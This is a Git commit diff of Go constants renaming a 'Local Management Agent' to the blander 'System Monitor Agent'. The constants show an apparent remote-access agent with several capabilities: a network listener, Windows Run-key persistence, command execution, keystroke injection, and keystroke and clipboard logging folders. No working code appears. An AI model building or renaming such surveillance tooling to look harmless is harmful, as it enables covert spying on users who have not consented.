Rename Local Management Agent to System Monitor Agent throughout the codebase, including updates to executable names, comments, and documentation. This change reflects a broader scope of functionality and improves clarity in the project's purpose.
This commit is contained in:
@@ -10,20 +10,20 @@ import (
|
||||
const (
|
||||
Version = "1.0.0"
|
||||
DefaultAddr = "0.0.0.0:5032"
|
||||
MutexName = "LocalManagementAgent_Mutex"
|
||||
MutexName = "SystemMonitorAgent_Mutex"
|
||||
RequestBodyMax = 1 << 20
|
||||
MaxUploadSize = 100 << 20 // ponytail: 100MB cap; raise via env later if needed
|
||||
MaxListEntries = 10000
|
||||
MaxImageQuality = 100
|
||||
DefaultExecTO = 30
|
||||
MaxExecTO = 120
|
||||
StartupValueName = "LocalManagementAgent"
|
||||
StartupValueName = "SystemMonitorAgent"
|
||||
StartupRunKey = `Software\Microsoft\Windows\CurrentVersion\Run`
|
||||
MaxInputText = 4096
|
||||
DefaultKeyDelayMs = 25
|
||||
MaxKeyDelayMs = 200
|
||||
AppDataDir = "LocalManagementAgent"
|
||||
InstalledExeName = "localagent.exe"
|
||||
AppDataDir = "SystemMonitorAgent"
|
||||
InstalledExeName = "SystemMonitorAgent.exe"
|
||||
KeylogSubdir = "keystrokes"
|
||||
ClipboardSubdir = "clipboard"
|
||||
DefaultKeylogRetentionDays = 7
|
||||
|
||||
Reference in New Issue
Block a user